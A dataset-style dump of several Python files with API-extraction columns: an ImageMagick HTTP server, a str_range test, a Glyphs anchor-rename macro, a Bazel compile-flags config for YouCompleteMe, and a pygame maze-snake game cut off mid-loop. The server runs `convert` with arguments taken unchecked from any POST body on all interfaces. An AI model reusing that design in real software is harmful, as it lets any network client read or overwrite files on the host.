code stringlengths 22 1.05M | apis listlengths 1 3.31k | extract_api stringlengths 75 3.25M |
|---|---|---|
from http.server import BaseHTTPRequestHandler,HTTPServer
from socketserver import ThreadingMixIn
import threading
import subprocess
import urllib.parse
# todo: factor out common server stuff
# todo: these should probably have limited
# access to files, so something like only
# uploads dir may be good.
# then there is slight problem about
# possibility to optimize theme files
# for example (which should be done first,
# but it'd be convenient to reuse this.)
# Maybe allow to mount a theme path
# Collecting args, stripping quotes string for
# it to work with subprocess.Popen
# Assuming only single quoted strings
def append_args(cmd_list, cmd_args):
    """Tokenize *cmd_args* and append the tokens to *cmd_list*.

    Whitespace separates tokens; a single-quoted run ('like this') becomes
    one token with the quotes stripped, so arguments containing spaces
    survive for subprocess.Popen. Only single quotes are recognized.

    Bug fix: the original loop iterated range(0, len(cmd_args) - 1) and so
    silently dropped the last character of the input, losing the final
    token (e.g. "a b c" -> ['a', 'b']). We now consume every character and
    treat any whitespace (including a trailing newline from an HTTP body)
    as a separator.

    Returns cmd_list (mutated in place) for convenience.
    """
    in_string = False
    accum = ""
    for char in cmd_args:
        if in_string:
            if char == "'":
                # Closing quote ends the token (even an empty one).
                cmd_list.append(accum)
                accum = ""
                in_string = False
            else:
                accum = accum + char
        elif char.isspace():
            # Separator outside quotes; flush any pending token.
            if accum != "":
                cmd_list.append(accum)
                accum = ""
        elif accum == "" and char == "'":
            # Quote only opens a string at a token boundary.
            in_string = True
        else:
            accum = accum + char
    if accum != "":
        cmd_list.append(accum)
    return cmd_list
class Handler(BaseHTTPRequestHandler):
    """Handles POST requests whose body is an ImageMagick argument string.

    The body is tokenized by append_args() and executed as `convert <args>`.
    """

    def do_POST(self):
        #subprocess.Popen(["ls", "-la", "/imgs"])
        #subprocess.Popen(["id", "-u"])
        #subprocess.Popen(["id", "-u", "-n"])
        content_length = int(self.headers['Content-Length'])
        cmd_args = self.rfile.read(content_length).decode('utf-8')
        if len(cmd_args) > 0:
            print(cmd_args)
            # SECURITY NOTE(review): the request body is passed straight to
            # `convert` as its argument list — any client controls the
            # command line (see the access-limiting TODOs at the top of the
            # file).
            cmd_list = append_args(["convert"], cmd_args)
            print(cmd_list)
            CmdOut = subprocess.Popen(cmd_list)
            # NOTE(review): stdout/stderr are not redirected to pipes, so
            # communicate() returns (None, None) here and the prints below
            # just show None.
            (stdout, stderr) = CmdOut.communicate()
            print(stdout)
            print(stderr)
        # Always answer 200 "ok", even when no command was run.
        self.send_response(200)
        self.send_header("Content-type", "text/plain")
        self.end_headers()
        self.wfile.write("ok".encode('utf-8'))

    #def log_message(self, format, *args):
    # suppress logging per request
    #return
class ThreadingSimpleServer(ThreadingMixIn, HTTPServer):
    """HTTPServer that serves each request on its own thread."""
    pass
if __name__ == '__main__':
    print('Imagemagick server starts')
    # Listen on all interfaces, port 1345, until Ctrl-C.
    httpd = ThreadingSimpleServer(('0.0.0.0', 1345), Handler)
    try:
        httpd.serve_forever()
    except KeyboardInterrupt:
        pass
    httpd.server_close()
    print('Imagemagick server stops')
| [
"subprocess.Popen"
] | [((1828, 1854), 'subprocess.Popen', 'subprocess.Popen', (['cmd_list'], {}), '(cmd_list)\n', (1844, 1854), False, 'import subprocess\n')] |
from solution import str_range
def test_same_start_end():
    # A degenerate range is its own iterator and yields exactly one char.
    rng = str_range('a', 'a')
    assert iter(rng) == rng
    assert 'a' == ''.join(rng)
def test_simple():
    # 'a' through 'c' inclusive, default step.
    assert ''.join(str_range('a', 'c')) == 'abc'
def test_simple_with_step():
    # A step of 2 skips 'b'.
    assert ''.join(str_range('a', 'c', 2)) == 'ac'
def test_simple_with_negativestep():
    # A negative step walks backwards from 'c'.
    assert ''.join(str_range('c', 'a', -2)) == 'ca'
def test_hebrew():
    # Non-ASCII (Hebrew) code points work too.
    assert ''.join(str_range('א', 'ז', 2)) == 'אגהז'
# Run every test directly so the file works without a test runner.
test_same_start_end()
test_simple()
test_simple_with_step()
test_simple_with_negativestep()
test_hebrew()
| [
"solution.str_range"
] | [((68, 87), 'solution.str_range', 'str_range', (['"""a"""', '"""a"""'], {}), "('a', 'a')\n", (77, 87), False, 'from solution import str_range\n'), ((176, 195), 'solution.str_range', 'str_range', (['"""a"""', '"""c"""'], {}), "('a', 'c')\n", (185, 195), False, 'from solution import str_range\n'), ((272, 294), 'solution.str_range', 'str_range', (['"""a"""', '"""c"""', '(2)'], {}), "('a', 'c', 2)\n", (281, 294), False, 'from solution import str_range\n'), ((378, 401), 'solution.str_range', 'str_range', (['"""c"""', '"""a"""', '(-2)'], {}), "('c', 'a', -2)\n", (387, 401), False, 'from solution import str_range\n'), ((467, 489), 'solution.str_range', 'str_range', (['"""א"""', '"""ז"""', '(2)'], {}), "('א', 'ז', 2)\n", (476, 489), False, 'from solution import str_range\n')] |
#MenuTitle: Find And Replace In Anchor Names
# -*- coding: utf-8 -*-
from __future__ import division, print_function, unicode_literals
from builtins import str
__doc__="""
Replaces strings in anchor names of all selected glyphs.
"""
import vanilla
class SearchAndReplaceInAnchorNames(object):
    """Floating-window UI that renames anchors in all selected glyphs.

    NOTE(review): `Glyphs` is an implicit global injected by the GlyphsApp
    macro environment; it is not imported in this file.
    """

    def __init__(self):
        # Window 'self.w':
        windowWidth = 520
        windowHeight = 58
        windowWidthResize = 0  # user can resize width by this value
        windowHeightResize = 0  # user can resize height by this value
        self.w = vanilla.FloatingWindow(
            (windowWidth, windowHeight),  # default window size
            "Search And Replace In Anchor Names",  # window title
            minSize=(windowWidth, windowHeight),  # minimum size (for resizing)
            maxSize=(windowWidth + windowWidthResize, windowHeight + windowHeightResize),  # maximum size (for resizing)
            autosaveName="com.mekkablue.SearchAndReplaceInAnchorNames.mainwindow"  # stores last window position and size
        )
        # UI elements: search/replace text fields plus the default button.
        self.w.textSearch = vanilla.TextBox((15, 12 + 2, 67, 14), "Search for:", sizeStyle='small')
        self.w.searchFor = vanilla.EditText((15 + 67, 12, 135, 19), "tip", sizeStyle='small')
        self.w.textReplace = vanilla.TextBox((225, 12 + 2, 67, 14), "Replace by:", sizeStyle='small')
        self.w.replaceBy = vanilla.EditText((225 + 67, 12, 135, 19), "top", sizeStyle='small')
        self.w.replaceButton = vanilla.Button((-80, 12 + 1, -15, 17), "Replace", sizeStyle='small', callback=self.SearchAndReplaceInAnchorNamesMain)
        self.w.setDefaultButton(self.w.replaceButton)
        # Load Settings:
        if not self.LoadPreferences():
            print("Note: 'Search And Replace In Anchor Names' could not load preferences. Will resort to defaults")
        # Open window and focus on it:
        self.w.open()
        self.w.makeKey()

    def SavePreferences(self, sender):
        """Persist both text fields to Glyphs defaults; False on any error."""
        try:
            Glyphs.defaults["com.mekkablue.SearchAndReplaceInAnchorNames.searchFor"] = self.w.searchFor.get()
            Glyphs.defaults["com.mekkablue.SearchAndReplaceInAnchorNames.replaceBy"] = self.w.replaceBy.get()
        except:
            return False
        return True

    def LoadPreferences(self):
        """Restore both text fields from Glyphs defaults; False on any error."""
        try:
            self.w.searchFor.set(Glyphs.defaults["com.mekkablue.SearchAndReplaceInAnchorNames.searchFor"])
            self.w.replaceBy.set(Glyphs.defaults["com.mekkablue.SearchAndReplaceInAnchorNames.replaceBy"])
        except:
            return False
        return True

    def SearchAndReplaceInAnchorNamesMain(self, sender):
        """Button callback: apply the string replacement to anchor names.

        Renames anchors on *all* layers of every selected glyph (not just
        the selected layer) and prints a per-glyph report of the changes.
        """
        try:
            searchString = self.w.searchFor.get()
            replaceString = self.w.replaceBy.get()
            thisFont = Glyphs.font  # frontmost font
            listOfSelectedLayers = thisFont.selectedLayers  # active layers of currently selected glyphs
            for thisLayer in listOfSelectedLayers:  # loop through layers
                thisGlyph = thisLayer.parent
                reportString = "Anchors renamed in %s:" % thisGlyph.name
                displayReportString = False
                for thisGlyphLayer in thisGlyph.layers:
                    for thisAnchor in thisGlyphLayer.anchors:
                        oldAnchorName = thisAnchor.name
                        newAnchorName = oldAnchorName.replace(searchString, replaceString)
                        if oldAnchorName != newAnchorName:
                            thisAnchor.setName_(newAnchorName)
                            reportString += "\n layer '%s': %s > %s" % (thisGlyphLayer.name, oldAnchorName, newAnchorName)
                            displayReportString = True
                if displayReportString:
                    print(reportString)
            if not self.SavePreferences(self):
                print("Note: 'Search And Replace In Anchor Names' could not write preferences.")
            self.w.close()  # delete if you want window to stay open
        except Exception as e:
            # brings macro window to front and reports error:
            Glyphs.showMacroWindow()
            print("Search And Replace In Anchor Names Error: %s" % e)
# brings macro window to front and clears its log:
# (`Glyphs` is supplied by the GlyphsApp host environment.)
Glyphs.clearLog()
Glyphs.showMacroWindow()
SearchAndReplaceInAnchorNames()
| [
"vanilla.EditText",
"vanilla.FloatingWindow",
"vanilla.TextBox",
"vanilla.Button"
] | [((523, 815), 'vanilla.FloatingWindow', 'vanilla.FloatingWindow', (['(windowWidth, windowHeight)', '"""Search And Replace In Anchor Names"""'], {'minSize': '(windowWidth, windowHeight)', 'maxSize': '(windowWidth + windowWidthResize, windowHeight + windowHeightResize)', 'autosaveName': '"""com.mekkablue.SearchAndReplaceInAnchorNames.mainwindow"""'}), "((windowWidth, windowHeight),\n 'Search And Replace In Anchor Names', minSize=(windowWidth,\n windowHeight), maxSize=(windowWidth + windowWidthResize, windowHeight +\n windowHeightResize), autosaveName=\n 'com.mekkablue.SearchAndReplaceInAnchorNames.mainwindow')\n", (545, 815), False, 'import vanilla\n'), ((1008, 1079), 'vanilla.TextBox', 'vanilla.TextBox', (['(15, 12 + 2, 67, 14)', '"""Search for:"""'], {'sizeStyle': '"""small"""'}), "((15, 12 + 2, 67, 14), 'Search for:', sizeStyle='small')\n", (1023, 1079), False, 'import vanilla\n'), ((1099, 1165), 'vanilla.EditText', 'vanilla.EditText', (['(15 + 67, 12, 135, 19)', '"""tip"""'], {'sizeStyle': '"""small"""'}), "((15 + 67, 12, 135, 19), 'tip', sizeStyle='small')\n", (1115, 1165), False, 'import vanilla\n'), ((1190, 1262), 'vanilla.TextBox', 'vanilla.TextBox', (['(225, 12 + 2, 67, 14)', '"""Replace by:"""'], {'sizeStyle': '"""small"""'}), "((225, 12 + 2, 67, 14), 'Replace by:', sizeStyle='small')\n", (1205, 1262), False, 'import vanilla\n'), ((1282, 1349), 'vanilla.EditText', 'vanilla.EditText', (['(225 + 67, 12, 135, 19)', '"""top"""'], {'sizeStyle': '"""small"""'}), "((225 + 67, 12, 135, 19), 'top', sizeStyle='small')\n", (1298, 1349), False, 'import vanilla\n'), ((1374, 1495), 'vanilla.Button', 'vanilla.Button', (['(-80, 12 + 1, -15, 17)', '"""Replace"""'], {'sizeStyle': '"""small"""', 'callback': 'self.SearchAndReplaceInAnchorNamesMain'}), "((-80, 12 + 1, -15, 17), 'Replace', sizeStyle='small',\n callback=self.SearchAndReplaceInAnchorNamesMain)\n", (1388, 1495), False, 'import vanilla\n')] |
#!/usr/bin/python
# Copyright 2018 GRAIL, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Configuration file for YouCompleteMe to fetch C++ compilation flags from
Bazel.
See https://github.com/ycm-core/YouCompleteMe#c-family-semantic-completion for
how YCM works. In that section:
For Option 1 (compilation database), use the generate.sh script in this
repository.
For Option 2 (.ycm_extra_conf.py), symlink this file to the root of your
workspace and bazel's output_base, or set it as your global config.
"""
from __future__ import print_function
import json
import os
import re
import shlex
import subprocess
import sys
import xml.etree.ElementTree as ElementTree
_BAZEL = os.getenv("BAZEL_COMPDB_BAZEL_PATH") or "bazel"
def bazel_info():
    """Returns a dict containing key values from bazel info.

    Exits the process quietly (status 0) when invoked outside a bazel
    workspace, which bazel signals with return code 2.
    """
    bazel_info_dict = dict()
    try:
        out = subprocess.check_output(
            [_BAZEL, 'info']).decode('utf-8').strip().split('\n')
    except subprocess.CalledProcessError as err:
        # This exit code is returned when this command is run outside of a
        # bazel workspace.
        if err.returncode == 2:
            sys.exit(0)
        # Bug fix: the original fell through here with `out` unbound and
        # crashed with a confusing UnboundLocalError; surface the real
        # failure instead.
        raise
    for line in out:
        # Each line looks like "key: value".
        key_val = line.strip().partition(": ")
        bazel_info_dict[key_val[0]] = key_val[2]
    return bazel_info_dict
def bazel_query(args):
    """Run `bazel query` with *args* and return its stdout as text."""
    # TODO: switch to cquery when it supports siblings and less crash-y with external repos.
    full_cmd = [_BAZEL, 'query'] + args
    query_proc = subprocess.Popen(full_cmd, stdout=subprocess.PIPE)
    raw_output, _ = query_proc.communicate()
    return raw_output.decode('utf-8')
def file_to_target(filepath):
    """Returns a string that works as a bazel target specification for the given file."""
    if not filepath.startswith("external/"):
        # The file path relative to repo root works for genfiles and binfiles too.
        return filepath
    # For external repos, we have to find the owner package manually.
    # 'external/repo/...' -> '@repo//' prefix, and strip the prefix from the path.
    repo_prefix = re.sub('external/([^/]*).*', '@\\1//', filepath)
    filepath = re.sub('external/[^/]*/', '', filepath)
    # Find out which package is the owner of this file.
    query_result = bazel_query(['-k', repo_prefix + '...', '--output=package'])
    packages = [package.strip() for package in query_result.split('\n')]
    # The owner is the longest package path that prefixes the file path.
    owner = ""
    for package in packages:
        package = package[len(repo_prefix):]
        if filepath.startswith(package) and len(package) > len(owner):
            owner = package
    return repo_prefix + owner + ":" + os.path.relpath(filepath, owner)
def standardize_file_target(file_target):
    """For file targets that are not source files, return the target that generated them.

    This is needed because rdeps of generated files do not include targets that reference
    their generating rules.
    https://github.com/bazelbuild/bazel/issues/4949
    """
    query_result = bazel_query(['--output=xml', file_target])
    if not query_result:
        sys.exit("Empty query response for {}. It is probably not handled by bazel".format(file_target))
    target_xml = ElementTree.fromstringlist(query_result.split('\n'))
    # A plain source file is already the right target.
    source_element = target_xml.find('source-file')
    if source_element is not None:
        return file_target
    # A generated file maps back to the rule that produced it.
    generated_element = target_xml.find('generated-file')
    if generated_element is not None:
        return generated_element.get('generating-rule')
    sys.exit("Error parsing query xml for " + file_target + ":\n" + query_result)
def get_aspects_filepath(label, bazel_bin):
    """Gets the file path for the generated aspects file that contains the
    compile commands json entries.

    '//pkg:name' maps to '<bazel_bin>/pkg/name.compile_commands.json';
    '@repo//pkg:name' maps under '<bazel_bin>/external/repo/...'.
    """
    path = label.replace(':', '/')
    path = re.sub('^@(.*)//', 'external/\\1/', path)
    path = path.lstrip('/')
    segments = (path + '.compile_commands.json').split('/')
    return os.path.join(bazel_bin, *segments)
def get_compdb_json(aspects_filepath, bazel_exec_root):
    """Read the aspects file, wrap its entries into a JSON array, and
    substitute the __EXEC_ROOT__ placeholder with the real exec root.
    """
    with open(aspects_filepath, 'r') as aspects_file:
        entries = aspects_file.read()
    wrapped = "[\n" + entries + "\n]"
    # The placeholder is a literal string, so plain replace() suffices.
    return wrapped.replace('__EXEC_ROOT__', bazel_exec_root)
def get_flags(filepath, compdb_json_str):
    """Gets the compile command flags from the compile command for the file.

    The command's argv[0] (the compiler) is dropped; only the flags and
    inputs are returned. Exits if the file has no compilation entry.
    """
    for entry in json.loads(compdb_json_str):
        if entry['file'] == filepath:
            return shlex.split(entry['command'])[1:]
    # This could imply we are fetching the wrong compile_commands.json or there
    # is a bug in aspects.bzl.
    sys.exit("File {f} not present in the compilation database".format(f=filepath))
def standardize_flags(flags, bazel_workspace):
    """Modifies *flags* (in place) for compilation outside of bazel.

    We need to add the workspace directly because the files symlinked in the
    execroot during a build disappear after a different build action.
    """
    flags += ['-iquote', bazel_workspace]
    return flags
def cfamily_settings(filename):
    """Returns C-family settings as a dict with at least a 'flags' key that
    points to an array of strings as flags.
    """
    bazel_info_dict = bazel_info()
    bazel_bin = bazel_info_dict['bazel-bin']
    bazel_genfiles = bazel_info_dict['bazel-genfiles']
    bazel_exec_root = bazel_info_dict['execution_root']
    bazel_workspace = bazel_info_dict['workspace']
    # All relative paths and bazel commands below assume the workspace root.
    os.chdir(bazel_workspace)
    # Valid prefixes for the file, in decreasing order of specificity.
    file_prefix = [p for p in [bazel_genfiles, bazel_bin, bazel_exec_root, bazel_workspace]
                   if filename.startswith(p)]
    if not file_prefix:
        sys.exit("Not a valid file: " + filename)
    filepath = os.path.relpath(filename, file_prefix[0])
    file_target = standardize_file_target(file_to_target(filepath))
    # File path relative to execroot, as it will appear in the compile command.
    if file_prefix[0].startswith(bazel_exec_root):
        filepath = os.path.relpath(filename, bazel_exec_root)
    # Find cc rules that directly depend on this file.
    cc_rules = "cc_(library|binary|test|inc_library|proto_library)"
    query_result = bazel_query([('kind("{cc_rules}", rdeps(siblings({f}), {f}, 1))'
                                 .format(f=file_target, cc_rules=cc_rules)), '--keep_going'])
    labels = [label.partition(" ")[0] for label in query_result.split('\n') if label]
    if not labels:
        sys.exit("No cc rules depend on this source file.")
    # Build the compilation-database aspect (shipped next to this script)
    # over those rules to produce *.compile_commands.json files.
    repository_override = '--override_repository=bazel_compdb=' + os.path.dirname(
        os.path.realpath(__file__))
    aspect_definition = '--aspects=@bazel_compdb//:aspects.bzl%compilation_database_aspect'
    bazel_aspects = [
        _BAZEL,
        'build',
        aspect_definition,
        repository_override,
        '--output_groups=compdb_files,header_files',
    ] + labels
    proc = subprocess.Popen(bazel_aspects, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    out, err = proc.communicate()
    if proc.returncode != 0:
        # NOTE(review): `out`/`err` are bytes here (no text mode), so
        # e.startswith("ERROR:") looks like it would raise TypeError on
        # Python 3 — verify; decoding out/err first may be required.
        errors = [e for e in out.splitlines() + err.splitlines()
                  if e.startswith("ERROR:")]
        if errors:
            raise Exception('/'.join(errors))
        else:
            raise Exception(err)
    aspects_filepath = get_aspects_filepath(labels[0], bazel_bin)
    compdb_json = get_compdb_json(aspects_filepath, bazel_exec_root)
    flags = standardize_flags(get_flags(filepath, compdb_json), bazel_workspace)
    return {
        'flags': flags,
        'include_paths_relative_to_dir': bazel_exec_root,
    }
#pylint: disable=C0103
def Settings(**kwargs):
    """Function that is called by YCM with language and filename arguments,
    and expects a dict of language-specific settings.

    Only the C family is handled; every other language gets an empty dict.
    """
    if kwargs['language'] != 'cfamily':
        return {}
    return cfamily_settings(kwargs['filename'])
# For testing; needs exactly one argument as path of file.
# Example: ./.ycm_extra_conf.py path/to/file.cc
if __name__ == '__main__':
    filename = os.path.abspath(sys.argv[1])
    print(Settings(language='cfamily', filename=filename))
| [
"subprocess.check_output",
"json.loads",
"os.getenv",
"shlex.split",
"subprocess.Popen",
"os.chdir",
"os.path.realpath",
"sys.exit",
"os.path.abspath",
"re.sub",
"os.path.relpath"
] | [((1188, 1224), 'os.getenv', 'os.getenv', (['"""BAZEL_COMPDB_BAZEL_PATH"""'], {}), "('BAZEL_COMPDB_BAZEL_PATH')\n", (1197, 1224), False, 'import os\n'), ((2039, 2090), 'subprocess.Popen', 'subprocess.Popen', (['query_cmd'], {'stdout': 'subprocess.PIPE'}), '(query_cmd, stdout=subprocess.PIPE)\n', (2055, 2090), False, 'import subprocess\n'), ((2502, 2550), 're.sub', 're.sub', (['"""external/([^/]*).*"""', '"""@\\\\1//"""', 'filepath'], {}), "('external/([^/]*).*', '@\\\\1//', filepath)\n", (2508, 2550), False, 'import re\n'), ((2566, 2605), 're.sub', 're.sub', (['"""external/[^/]*/"""', '""""""', 'filepath'], {}), "('external/[^/]*/', '', filepath)\n", (2572, 2605), False, 'import re\n'), ((3924, 4001), 'sys.exit', 'sys.exit', (["('Error parsing query xml for ' + file_target + ':\\n' + query_result)"], {}), "('Error parsing query xml for ' + file_target + ':\\n' + query_result)\n", (3932, 4001), False, 'import sys\n'), ((4184, 4207), 're.sub', 're.sub', (['""":"""', '"""/"""', 'label'], {}), "(':', '/', label)\n", (4190, 4207), False, 'import re\n'), ((4226, 4274), 're.sub', 're.sub', (['"""^@(.*)//"""', '"""external/\\\\1/"""', 'target_path'], {}), "('^@(.*)//', 'external/\\\\1/', target_path)\n", (4232, 4274), False, 'import re\n'), ((4293, 4323), 're.sub', 're.sub', (['"""^/*"""', '""""""', 'target_path'], {}), "('^/*', '', target_path)\n", (4299, 4323), False, 'import re\n'), ((4763, 4820), 're.sub', 're.sub', (['"""__EXEC_ROOT__"""', 'bazel_exec_root', 'compdb_json_str'], {}), "('__EXEC_ROOT__', bazel_exec_root, compdb_json_str)\n", (4769, 4820), False, 'import re\n'), ((4963, 4990), 'json.loads', 'json.loads', (['compdb_json_str'], {}), '(compdb_json_str)\n', (4973, 4990), False, 'import json\n'), ((6118, 6143), 'os.chdir', 'os.chdir', (['bazel_workspace'], {}), '(bazel_workspace)\n', (6126, 6143), False, 'import os\n'), ((6443, 6484), 'os.path.relpath', 'os.path.relpath', (['filename', 'file_prefix[0]'], {}), '(filename, file_prefix[0])\n', (6458, 6484), 
False, 'import os\n'), ((7565, 7644), 'subprocess.Popen', 'subprocess.Popen', (['bazel_aspects'], {'stdout': 'subprocess.PIPE', 'stderr': 'subprocess.PIPE'}), '(bazel_aspects, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n', (7581, 7644), False, 'import subprocess\n'), ((8648, 8676), 'os.path.abspath', 'os.path.abspath', (['sys.argv[1]'], {}), '(sys.argv[1])\n', (8663, 8676), False, 'import os\n'), ((3043, 3075), 'os.path.relpath', 'os.path.relpath', (['filepath', 'owner'], {}), '(filepath, owner)\n', (3058, 3075), False, 'import os\n'), ((6385, 6426), 'sys.exit', 'sys.exit', (["('Not a valid file: ' + filename)"], {}), "('Not a valid file: ' + filename)\n", (6393, 6426), False, 'import sys\n'), ((6704, 6746), 'os.path.relpath', 'os.path.relpath', (['filename', 'bazel_exec_root'], {}), '(filename, bazel_exec_root)\n', (6719, 6746), False, 'import os\n'), ((7109, 7160), 'sys.exit', 'sys.exit', (['"""No cc rules depend on this source file."""'], {}), "('No cc rules depend on this source file.')\n", (7117, 7160), False, 'import sys\n'), ((5130, 5150), 'shlex.split', 'shlex.split', (['command'], {}), '(command)\n', (5141, 5150), False, 'import shlex\n'), ((7253, 7279), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (7269, 7279), False, 'import os\n'), ((1636, 1647), 'sys.exit', 'sys.exit', (['(0)'], {}), '(0)\n', (1644, 1647), False, 'import sys\n'), ((1373, 1414), 'subprocess.check_output', 'subprocess.check_output', (["[_BAZEL, 'info']"], {}), "([_BAZEL, 'info'])\n", (1396, 1414), False, 'import subprocess\n')] |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import argparse
import glob
import os
import pygame
import random
import subprocess
import time
import maze_map
MIN_MARGIN = 32
PROGRESS_BAR_HEIGHT = 8
SELF_DIR = os.path.dirname(os.path.realpath(__file__))
class Game:
    """One round of maze-snake rendered onto a pygame surface.

    The snake grows by eating food; reaching `_ending_length` segments
    triggers the ending (image + looping song, or an external vlc video
    when `video_ending` is set).
    """

    def __init__(self, map_size: int, maze: bool, video_ending: bool, surface):
        self._map_size = map_size
        self._surface = surface
        self._video_ending = video_ending
        self._maze_map = maze_map.MazeMap(map_size, map_size, maze)
        surface_width, surface_height = surface.get_size()
        assert surface_width >= surface_height
        # Fit the square board (plus margins and the progress bar) into
        # the surface height.
        self._grid_size = (
            surface_height - MIN_MARGIN * 2 - PROGRESS_BAR_HEIGHT) // map_size
        if self._grid_size % 2 == 0:
            self._grid_size -= 1  # make sure self._grid_size is odd
        assert self._grid_size > 0
        # Top-left corner of the board, centered on the surface.
        self._left = (surface_width - map_size * self._grid_size) // 2
        self._top = (surface_height -
                     map_size * self._grid_size) // 2 + PROGRESS_BAR_HEIGHT
        self._food_imgs = self._load_food_imgs()
        self._ending_img = self._load_ending_img()
        self._mplayer_proc = None
        # Snake starts as head + one body segment, both at the center.
        self._snake_pos = [(map_size // 2, map_size // 2)] * 2
        self._food_pos = self._gen_food_pos()
        self._food_img = random.choice(self._food_imgs)
        self._is_ended = False
        self._ending_length = min(
            self._maze_map.x_size() * 2,
            self._maze_map.x_size() * self._maze_map.y_size() // 2)
        self._background_songs = glob.glob(SELF_DIR + '/bgmusic/*.mp3')
        assert self._background_songs
        random.shuffle(self._background_songs)
        self._play_background_music()

    def __del__(self):
        # Stop the external video player if the ending spawned one.
        if self._mplayer_proc:
            self._mplayer_proc.kill()

    def _gen_food_pos(self):
        """Pick a random cell that is not occupied by the snake."""
        while True:
            food_pos = (random.randint(0,
                                       self._maze_map.x_size() - 1),
                        random.randint(0,
                                       self._maze_map.y_size() - 1))
            if food_pos not in self._snake_pos:
                return food_pos

    def _load_food_imgs(self):
        """Load every food sprite, scaled to one grid cell."""
        img_files = glob.glob(SELF_DIR + '/food_img/*.png')
        assert img_files
        imgs = []
        for img_file in img_files:
            imgs.append(
                pygame.transform.scale(
                    pygame.image.load(img_file),
                    (self._grid_size, self._grid_size)))
        return imgs

    def _load_ending_img(self):
        """Load the ending picture, scaled to a square fitting the surface."""
        img_size = min(self._surface.get_size())
        return pygame.transform.scale(
            pygame.image.load(SELF_DIR + '/ending.png'), (img_size, img_size))

    def _play_background_music(self):
        """Loop the ending song when finished, else play the next bg song."""
        if self._is_ended:
            pygame.mixer.music.load(SELF_DIR + '/ending.mp3')
            pygame.mixer.music.set_volume(1.0)
            pygame.mixer.music.play(-1)
        else:
            pygame.mixer.music.load(self._background_songs[0])
            pygame.mixer.music.set_volume(0.4)
            pygame.mixer.music.play(-1)
            # Rotate the playlist so the next call starts the next song.
            self._background_songs = self._background_songs[1:] + [
                self._background_songs[0]
            ]

    def update(self, direction):
        """Advance one step in *direction* (or None) and redraw the frame."""
        if self._is_ended:
            return
        if direction:
            assert direction in self._maze_map.directions()
            # Walls block movement: ignore the key press entirely.
            if not self._maze_map.is_connected(self._snake_pos[0], direction):
                return
            new_head_pos = (self._snake_pos[0][0] + direction[0],
                            self._snake_pos[0][1] + direction[1])
            if new_head_pos == self._food_pos:
                # Grow by one segment (keep the tail).
                self._snake_pos = [new_head_pos] + self._snake_pos
                if len(self._snake_pos) >= self._ending_length:
                    self._is_ended = True
                    if self._video_ending:
                        pygame.mixer.music.stop()
                        self._mplayer_proc = subprocess.Popen(
                            ['vlc', '-f', SELF_DIR + '/ending.mp4'])
                    else:
                        self._play_background_music()
                else:
                    self._food_pos = self._gen_food_pos()
                    self._food_img = random.choice(self._food_imgs)
                    self._play_background_music()
            else:
                # Normal move: new head, drop the tail.
                self._snake_pos = [new_head_pos] + self._snake_pos[:-1]
        self._surface.fill(pygame.Color(0, 0, 0))
        if self._is_ended:
            surface_width, surface_height = self._surface.get_size()
            assert surface_width >= surface_height
            self._surface.blit(self._ending_img,
                               ((surface_width - surface_height) // 2, 0))
        else:
            grid_color = pygame.Color(20, 20, 20)
            wall_color = pygame.Color(255, 255, 255)
            head_color = pygame.Color(100, 255, 100)
            body_color = pygame.Color(80, 160, 80)
            # progress bar
            progress_bar_length = self._surface.get_width() * len(
                self._snake_pos) // self._ending_length
            self._surface.fill(
                head_color,
                pygame.Rect(0, 0, progress_bar_length, PROGRESS_BAR_HEIGHT))
            # Faint grid lines.
            for x in range(self._map_size + 1):
                pygame.draw.line(self._surface, grid_color,
                                 (self._left + x * self._grid_size, self._top),
                                 (self._left + x * self._grid_size,
                                  self._top + self._map_size * self._grid_size))
            for y in range(self._map_size + 1):
                pygame.draw.line(self._surface, grid_color,
                                 (self._left, self._top + y * self._grid_size),
                                 (self._left + self._map_size * self._grid_size,
                                  self._top + y * self._grid_size))
            # Maze walls wherever two neighboring cells are not connected,
            # plus the outer border.
            for x in range(self._map_size + 1):
                for y in range(self._map_size):
                    if x == self._map_size or not self._maze_map.is_connected(
                            (x, y), (-1, 0)):
                        pygame.draw.line(
                            self._surface, wall_color,
                            (self._left + x * self._grid_size,
                             self._top + y * self._grid_size),
                            (self._left + x * self._grid_size,
                             self._top + (y + 1) * self._grid_size), 3)
            for y in range(self._map_size + 1):
                for x in range(self._map_size):
                    if y == self._map_size or not self._maze_map.is_connected(
                            (x, y), (0, -1)):
                        pygame.draw.line(
                            self._surface, wall_color,
                            (self._left + x * self._grid_size,
                             self._top + y * self._grid_size),
                            (self._left + (x + 1) * self._grid_size,
                             self._top + y * self._grid_size), 3)
            # Draw the tail first so the head ends up on top.
            for i, pos in reversed(list(enumerate(self._snake_pos))):
                if i == 0:  # head
                    radius = int(self._grid_size * 0.45)
                    color = head_color
                else:
                    radius = int(self._grid_size * 0.3)
                    color = body_color
                pygame.draw.circle(
                    self._surface, color,
                    (self._left + pos[0] * self._grid_size +
                     self._grid_size // 2 + 1, self._top +
                     pos[1] * self._grid_size + self._grid_size // 2 + 1),
                    radius)
            self._surface.blit(
                self._food_img,
                (self._left + self._food_pos[0] * self._grid_size,
                 self._top + self._food_pos[1] * self._grid_size))
        pygame.display.flip()

    def is_ended(self) -> bool:
        """True once the snake reached the ending length."""
        return self._is_ended
def main():
    """Parse CLI flags and run the event loop; SPACE after an ending
    restarts with a larger map, Ctrl-Q or window close quits."""
    parser = argparse.ArgumentParser(description='Snake')
    parser.add_argument('--map_size', type=int, default=6)
    parser.add_argument('--maze', action='store_true')
    parser.add_argument('--video_ending', action='store_true')
    args = parser.parse_args()
    pygame.init()
    pygame.display.set_caption("Snake")
    pygame.mouse.set_visible(False)
    surface = pygame.display.set_mode((0, 0), pygame.FULLSCREEN)
    game = Game(args.map_size, args.maze, args.video_ending, surface)
    while True:
        event = pygame.event.wait()
        if event.type == pygame.QUIT:
            break
        direction = None
        if event.type == pygame.KEYDOWN:
            mods = pygame.key.get_mods()
            # Ctrl-Q quits.
            if mods & pygame.KMOD_CTRL and event.key == pygame.K_q:
                break
